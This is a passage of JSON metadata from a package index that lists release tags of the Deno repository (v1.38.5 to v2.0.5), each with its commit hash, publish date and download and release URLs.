/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ec